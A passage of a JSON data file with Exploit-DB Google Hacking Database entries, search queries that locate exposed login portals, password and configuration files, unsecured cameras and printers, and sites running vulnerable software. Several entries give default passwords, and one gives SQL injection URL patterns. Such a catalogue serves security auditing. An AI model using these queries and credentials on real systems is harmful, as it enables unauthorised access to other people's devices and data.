"inurl:exchweb/bin/auth/owalogon.asp", "textualDescription": "Outlook Web Access Login POrtal" }, { "signatureReferenceNumber": "993", "link": "https://www.exploit-db.com/ghdb/993/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%2FSUSAdmin+intitle%3A%22Microsoft+Software+Update+Services%22&btnG=Search", "shortDescription": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "textualDescription": "Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.It can be used to gain access to a Patch Deployment server. If you successfully login to that server you can possibly compromise all the other network servers." }, { "signatureReferenceNumber": "994", "link": "https://www.exploit-db.com/ghdb/994/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Netopia+Router+(*.)%22%22to+view+this+site%22&filter=0", "shortDescription": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "textualDescription": "Web admin for netopia routersThis Web tool provides access to information about the current status of your router and connections." }, { "signatureReferenceNumber": "995", "link": "https://www.exploit-db.com/ghdb/995/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22VisNetic+WebMail%22+inurl:%22/mail/%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "textualDescription": "VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer." }, { "signatureReferenceNumber": "996", "link": "https://www.exploit-db.com/ghdb/996/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:perform.ini+filetype:ini", "shortDescription": "inurl:perform.ini filetype:ini", "textualDescription": "mIRC Passwords For Nicks & Channels in channel\\[chanfolder] section of mirc.ini you can find 2 type of \"private\" information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)" }, { "signatureReferenceNumber": "997", "link": "https://www.exploit-db.com/ghdb/997/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=(cam1java)%7C(cam2java)%7C(cam3java)%7C(cam4java)%7C(cam5java)%7C(cam6java)+-navy.mil+-backflip+-power.ne.jp&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "textualDescription": "Kpix Java Based Traffic Cameras. Based at CBS broadcasting for San Fransisco, Oakland, and San Jose." }, { "signatureReferenceNumber": "998", "link": "https://www.exploit-db.com/ghdb/998/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=allintitle%3A%22Welcome+to+the+Cyclades%22&btnG=Google+Search&meta=", "shortDescription": "allintitle:\"Welcome to the Cyclades\"", "textualDescription": "This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)The default username and password for these devices is, root/tslinux.This query currently only returns pages available in Google's cache (but in the future more devices may be returned)." }, { "signatureReferenceNumber": "999", "link": "https://www.exploit-db.com/ghdb/999/", "category": "Pages containing login portals", "querystring": "http://www.google.co.uk/search?q=intitle%3A%22XcAuctionLite%22+%7C+%22DRIVEN+BY+XCENT%22+Lite+inurl%3Aadmin", "shortDescription": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "textualDescription": "This query reveals login pages for the administration of XcAuction and XcClassified Lite..\"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site.\"\"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features.\"" }, { "signatureReferenceNumber": "1000", "link": "https://www.exploit-db.com/ghdb/1000/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=intext%3A%22Powered+by+X-Cart%3A+shopping+cart+software%22+-site%3Ax-cart.com&btnG=Search", "shortDescription": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "textualDescription": "X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information." }, { "signatureReferenceNumber": "1001", "link": "https://www.exploit-db.com/ghdb/1001/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22PowerDownload%22+(%22PowerDownload+v3.0.2+\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9%22+%7C+%22PowerDownload+v3.0.3+\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9%22+)+-site:powerscripts.org", "shortDescription": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9\" | \"PowerDownload v3.0.3 \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9\" ) -site:powerscripts.org", "textualDescription": "The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)Date: 05/31/2005Severity: High. Remote Users Can Execute Arbitrary Code.Affected version: v3.0.2 & v3.0.3vendor: http://www.powerscripts.org/* Fix *Contact the Vendor* References *http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt" }, { "signatureReferenceNumber": "1002", "link": "https://www.exploit-db.com/ghdb/1002/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=intitle%3A%22PHPstat%22+intext%3A%22Browser%22+intext%3A%22PHPstat+setup%22&btnG=Search", "shortDescription": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "textualDescription": "Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt" }, { "signatureReferenceNumber": "1003", "link": "https://www.exploit-db.com/ghdb/1003/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22portailphp+v1.3%22+inurl:%22index.php%3Faffiche%22+inurl:%22PortailPHP%22+-site:safari-msi.com&filter=0", "shortDescription": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "textualDescription": "Vulnerability has been found in parameter \"id\". If this variableAny value it is possible to replace it with a sign ' is transferredSince this parameter is involved in all modules, all of themAre vulnerable.It occurs because of absence of a filtration of parameter id.Exampleshttp://example/index.php?affiche=News&id='[SQL inj]http://example/index.php?affiche=File&id='[SQL inj]http://example/index.php?affiche=Liens&id='[SQL inj]http://example/index.php?affiche=Faq&id='[SQL inj]The conclusionVulnerability is found out in version 1.3, on other versionsDid not check. Probably they too are vulnerable." }, { "signatureReferenceNumber": "1004", "link": "https://www.exploit-db.com/ghdb/1004/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%2Bintext%3A%22powered+by+MyBulletinBoard%22&btnG=Search&hl=en&lr=&safe=off&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial", "shortDescription": "+intext:\"powered by MyBulletinBoard\"", "textualDescription": "MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB)" }, { "signatureReferenceNumber": "1005", "link": "https://www.exploit-db.com/ghdb/1005/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl%3A%22S%3D320x240%22+%7C+inurl%3A%22S%3D160x120%22+inurl%3A%22Q%3DMobile%22", "shortDescription": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mobile\"", "textualDescription": "Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &N=* at the end of the URL changes the language of the camera control links, &N=0 is english.This is a slightly modified version of WarChylde's query, which gives more results." }, { "signatureReferenceNumber": "1006", "link": "https://www.exploit-db.com/ghdb/1006/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3AXcCDONTS.asp", "shortDescription": "inurl:XcCDONTS.asp", "textualDescription": "This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious!" }, { "signatureReferenceNumber": "1007", "link": "https://www.exploit-db.com/ghdb/1007/", "category": "Files containing usernames", "querystring": "http://www.google.com/search?q=intext:%22SteamUserPassphrase%3D%22+intext:%22SteamAppUser%3D%22+-%22username%22++-%22user%22&filter=0", "shortDescription": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "textualDescription": "This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file." }, { "signatureReferenceNumber": "1008", "link": "https://www.exploit-db.com/ghdb/1008/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&rls=GGLG%2CGGLG%3A2005-22%2CGGLG%3Aen&q=inurl%3A%22CgiStart%3Fpage%3D%22&btnG=Search", "shortDescription": "inurl:\"CgiStart?page=\"", "textualDescription": "This search reveals even more Panasonic IP cameras!" }, { "signatureReferenceNumber": "1009", "link": "https://www.exploit-db.com/ghdb/1009/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Powered+by+flatnuke-2.5.3%22+%2B%22Get+RSS+News%22+-demo", "shortDescription": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "textualDescription": "Description of VulnerabilitiesMultiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.If the \"/flatnuke/foot_news.php\" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.[..]User-supplied input passed to the \"image\" parameter in the \"thumb.php\" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters." }, { "signatureReferenceNumber": "1010", "link": "https://www.exploit-db.com/ghdb/1010/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype%3Adat+inurl%3Apass.dat&btnG=Search", "shortDescription": "inurl:pass.dat", "textualDescription": "Accesses passwords mostly in cgibin but not all the timeCan find passwords + usernames (sometimes username), some unecrypted some not" }, { "signatureReferenceNumber": "1011", "link": "https://www.exploit-db.com/ghdb/1011/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=intext%3A%22Welcome+to%22+inurl%3A%22cp%22+intitle%3A%22H-SPHERE%22+inurl%3A%22begin.html%22+-Fee", "shortDescription": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "textualDescription": "This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details" }, { "signatureReferenceNumber": "1012", "link": "https://www.exploit-db.com/ghdb/1012/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22phpinfo%28%29%22+%2B%22mysql.default_password%22+%2B%22Zend+Scripting+Language+Engine%22", "shortDescription": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "textualDescription": "This will look throught default phpinfo pages for ones that have a default mysql password." }, { "signatureReferenceNumber": "1013", "link": "https://www.exploit-db.com/ghdb/1013/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22configuration%22+inurl%3Aport_0&btnG=Search", "shortDescription": "intitle:\"configuration\" inurl:port_0", "textualDescription": "More dell and lexmark printers, The usual things included." }, { "signatureReferenceNumber": "1014", "link": "https://www.exploit-db.com/ghdb/1014/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&as_qdr=all&q=intitle%3A%22Dell+Laser+Printer+M5200%22+port_0&btnG=Search", "shortDescription": "intitle:\"Dell Laser Printer M5200\" port_0", "textualDescription": "Dell Laser Printer M5200" }, { "signatureReferenceNumber": "1015", "link": "https://www.exploit-db.com/ghdb/1015/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=printers%2Fprintman.html&btnG=Google+Search", "shortDescription": "printers/printman.html", "textualDescription": "some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses." }, { "signatureReferenceNumber": "1016", "link": "https://www.exploit-db.com/ghdb/1016/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22RICOH+Network+Printer+D+model-Restore+Factory%22&btnG=Search", "shortDescription": "\"RICOH Network Printer D model-Restore Factory\"", "textualDescription": "Not a whole lot here." }, { "signatureReferenceNumber": "1017", "link": "https://www.exploit-db.com/ghdb/1017/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22GCC+WebAdmin%22+-gcc.ru&btnG=Search", "shortDescription": "intitle:\"GCC WebAdmin\" -gcc.ru", "textualDescription": "All sorts of various printer status information" }, { "signatureReferenceNumber": "1018", "link": "https://www.exploit-db.com/ghdb/1018/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22XMail+Web+Administration+Interface%22+intext:Login+intext:password", "shortDescription": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "textualDescription": "This search will find the Web Administration Interface for servers running XMail.\"XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking\", etc..." }, { "signatureReferenceNumber": "1019", "link": "https://www.exploit-db.com/ghdb/1019/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22AXIS+240+Camera+Server%22+intext:%22server+push%22+-help&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-US:official&start=10&sa=N&filter=0", "shortDescription": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "textualDescription": "This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based." }, { "signatureReferenceNumber": "1020", "link": "https://www.exploit-db.com/ghdb/1020/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22html+allowed%22+guestbook&btnG=Search", "shortDescription": "\"html allowed\" guestbook", "textualDescription": "When this is typed in google it finds websites which have HTML Enabled guestbooks. This is really stupid as users could totally mess up their guestbook by adding commands like or adding a loop javascript pop-up" }, { "signatureReferenceNumber": "1021", "link": "https://www.exploit-db.com/ghdb/1021/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&safe=off&q=intext%3A%22Powered+By%3A+Snitz+Forums+2000+Version+3.4.00..03%22&btnG=Search", "shortDescription": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "textualDescription": "snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well." }, { "signatureReferenceNumber": "1022", "link": "https://www.exploit-db.com/ghdb/1022/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&biw=1400&q=filetype%3AQBW+qbw&btnG=Search", "shortDescription": "filetype:QBW qbw", "textualDescription": "Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. This could lead to identity theft, or worse..." }, { "signatureReferenceNumber": "1023", "link": "https://www.exploit-db.com/ghdb/1023/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl%3Acgi-bin+inurl%3Acalendar.cfg", "shortDescription": "inurl:cgi-bin inurl:calendar.cfg", "textualDescription": "CGI Calendar (Perl) configuration file reveals information including passwords for the program." }, { "signatureReferenceNumber": "1024", "link": "https://www.exploit-db.com/ghdb/1024/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22%2Flogin.asp%3Ffolder%3D%22+%22Powered+by%3A+i-Gallery+3.3%22", "shortDescription": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "textualDescription": "i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt" }, { "signatureReferenceNumber": "1025", "link": "https://www.exploit-db.com/ghdb/1025/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Calendar+Program+%C2%A9+Copyright+1999+Matt+Kruse%22+%22Add+an+event%22&btnG=Search", "shortDescription": "intext:\"Calendar Program \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Copyright 1999 Matt Kruse\" \"Add an event\"", "textualDescription": "This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques." }, { "signatureReferenceNumber": "1026", "link": "https://www.exploit-db.com/ghdb/1026/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&biw=1003&q=intitle%3A%22Login+to+Cacti%22", "shortDescription": "intitle:\"Login to Cacti\"", "textualDescription": "Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality." }, { "signatureReferenceNumber": "1027", "link": "https://www.exploit-db.com/ghdb/1027/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=%22set+up+the+administrator+user%22+inurl%3Apivot", "shortDescription": "\"set up the administrator user\" inurl:pivot", "textualDescription": "Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog." }, { "signatureReferenceNumber": "1028", "link": "https://www.exploit-db.com/ghdb/1028/", "category": "Pages containing login portals", "querystring": "http://www.google.de/search?hl=de&q=inurl%3Atextpattern%2Findex.php&btnG=Google-Suche&meta=", "shortDescription": "inurl:textpattern/index.php", "textualDescription": "Login portal for textpattern a CMS/Blogger tool." }, { "signatureReferenceNumber": "1029", "link": "https://www.exploit-db.com/ghdb/1029/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=tilt+intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml&btnG=Search", "shortDescription": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "textualDescription": "A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun!" }, { "signatureReferenceNumber": "1030", "link": "https://www.exploit-db.com/ghdb/1030/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+PhpBB+2.0.15%22+-site%3Aphpbb.com&btnG=Search", "shortDescription": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "textualDescription": "Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15 Viewtopic.PHP Remote Code Execution VulnerabilityThis exploit gives the user all the details about the databaseconnection such as database host, username, password anddatabase name." }, { "signatureReferenceNumber": "1031", "link": "https://www.exploit-db.com/ghdb/1031/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=filetype%3APS+ps", "shortDescription": "filetype:PS ps", "textualDescription": "PS is for \"postscript\"...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff." }, { "signatureReferenceNumber": "1032", "link": "https://www.exploit-db.com/ghdb/1032/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22You+have+requested+access+to+a+restricted+area+of+our+website.+Please+authenticate+yourself+to+continue.%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "textualDescription": "BackgroundEasySite is a Content Management System (CMS) build on PHP and MySQL. Many easysite servers still use the default username and password, however all of them have been contacted about this problem." }, { "signatureReferenceNumber": "1033", "link": "https://www.exploit-db.com/ghdb/1033/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22pictures+thumbnails%22+site%3Apictures.sprintpcs.com", "shortDescription": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "textualDescription": "This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. This search exposes the thumbnail album, only if the user has elected to share the photo album.Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on." }, { "signatureReferenceNumber": "1034", "link": "https://www.exploit-db.com/ghdb/1034/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=allinurl%3Acdkey.txt", "shortDescription": "allinurl:cdkey.txt", "textualDescription": "cdkeys" }, { "signatureReferenceNumber": "1035", "link": "https://www.exploit-db.com/ghdb/1035/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22TANDBERG%22+%22This+page+requires+a+frame+capable+browser!%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "textualDescription": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously." }, { "signatureReferenceNumber": "1036", "link": "https://www.exploit-db.com/ghdb/1036/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Middle+frame+of+Videoconference+Management+System%22+ext%3Ahtm&btnG=Search", "shortDescription": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "textualDescription": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously." }, { "signatureReferenceNumber": "1037", "link": "https://www.exploit-db.com/ghdb/1037/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Veo+Observer+Web+Client%22&btnG=Search", "shortDescription": "intitle:\"Veo Observer Web Client\"", "textualDescription": "Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append \"LGI_en.htm\" to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that." }, { "signatureReferenceNumber": "1038", "link": "https://www.exploit-db.com/ghdb/1038/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22TOPdesk+ApplicationServer%22&btnG=Search", "shortDescription": "intitle:\"TOPdesk ApplicationServer\"", "textualDescription": "Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on." }, { "signatureReferenceNumber": "1039", "link": "https://www.exploit-db.com/ghdb/1039/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22Welcome+to+Mailtraq+WebMail%22", "shortDescription": "intitle:\"Welcome to Mailtraq WebMail\"", "textualDescription": "Mailtraq WebMail is just another a web-based e-mail client. This is the login page." }, { "signatureReferenceNumber": "1040", "link": "https://www.exploit-db.com/ghdb/1040/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Java+Applet+Page%22+inurl%3Aml+&num=100", "shortDescription": "intitle:\"Java Applet Page\" inurl:ml", "textualDescription": "Another Standalone Network Camera.Default Login: remove wg_jwebeye.ml to get a nice clue ..Server: wg_httpd/1.0(based Boa/0.92q)" }, { "signatureReferenceNumber": "1041", "link": "https://www.exploit-db.com/ghdb/1041/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22WEBDVR%22+-inurl:product+-inurl:demo&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "textualDescription": "DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify." }, { "signatureReferenceNumber": "1042", "link": "https://www.exploit-db.com/ghdb/1042/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22This+section+is+for+Administrators+only.+If+you+are+an+administrator+then+please%22&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0", "shortDescription": "\"This section is for Administrators only. If you are an administrator then please\"", "textualDescription": "Nothing special, just one more set of login pages, but the \"Administrators only\" line is a classic." }, { "signatureReferenceNumber": "1043", "link": "https://www.exploit-db.com/ghdb/1043/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Member+Login%22+%22NOTE:+Your+browser+must+have+cookies+enabled+in+order+to+log+into+the+site.%22+ext:php+OR+ext:cgi&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "textualDescription": "Pretty standered login pages, they all have various differences but it appears that they use the same script or software." }, { "signatureReferenceNumber": "1044", "link": "https://www.exploit-db.com/ghdb/1044/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=site%3Awww.mailinator.com+inurl%3AShowMail.do", "shortDescription": "site:www.mailinator.com inurl:ShowMail.do", "textualDescription": "Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized." }, { "signatureReferenceNumber": "1045", "link": "https://www.exploit-db.com/ghdb/1045/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=filetype%3Amdb+%22standard+jet%22+%28password+%7C+username+%7C+user+%7C+pass%29&btnG=Search", "shortDescription": "filetype:mdb \"standard jet\"", "textualDescription": "These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data." }, { "signatureReferenceNumber": "1046", "link": "https://www.exploit-db.com/ghdb/1046/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?as_q=intitle%3Akerio&num=100&hl=en&c2coff=1&btnG=Google+Search&as_epq=inurl%3Adefault+login+php+&as_oq=&as_eq=&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images", "shortDescription": "inurl:\"default/login.php\" intitle:\"kerio\"", "textualDescription": "This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. Download can be found here http://www.kerio.com/kms_download.html." }, { "signatureReferenceNumber": "1047", "link": "https://www.exploit-db.com/ghdb/1047/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:(doc+%7C+pdf+%7C+xls+%7C+txt+%7C+ps+%7C+rtf+%7C+odt+%7C+sxw+%7C+psw+%7C+ppt+%7C+pps+%7C+xml)+(intext:confidential+salary+%7C+intext:%22budget+approved%22)+inurl:confidential", "shortDescription": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "textualDescription": "Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information." }, { "signatureReferenceNumber": "1048", "link": "https://www.exploit-db.com/ghdb/1048/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=%5BWFClient%5D+Password%3D+filetype%3Aica", "shortDescription": "[WFClient] Password= filetype:ica", "textualDescription": "The WinFrame-Client infos needed by users to connect toCitrix Application Servers (e.g. Metaframe).Often linked/stored on Webservers and sometimes reachable from Internet.Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).File Extension is \"ica\" the so called Citrix\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae Independent Computing Architecture.These files may contain login information (Username, Password, Domain)." }, { "signatureReferenceNumber": "1049", "link": "https://www.exploit-db.com/ghdb/1049/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22V1%22+%22welcome+to+phone+settings%22+password&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"V1\" \"welcome to phone settings\" password", "textualDescription": "This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321." }, { "signatureReferenceNumber": "1050", "link": "https://www.exploit-db.com/ghdb/1050/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22HP+ProCurve+Switch+*%22+%22This+product+requires+a+frame+capable+browser.%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"HP ProCurve Switch *\" \"This product requires a frame capable browser.\"", "textualDescription": "HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details)." }, { "signatureReferenceNumber": "1051", "link": "https://www.exploit-db.com/ghdb/1051/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+by+Gravity+Board%22&btnG=Cerca+con+Google&meta=", "shortDescription": "\"Powered by Gravity Board\"", "textualDescription": "4.22 07/08/2005 Gravity Board X 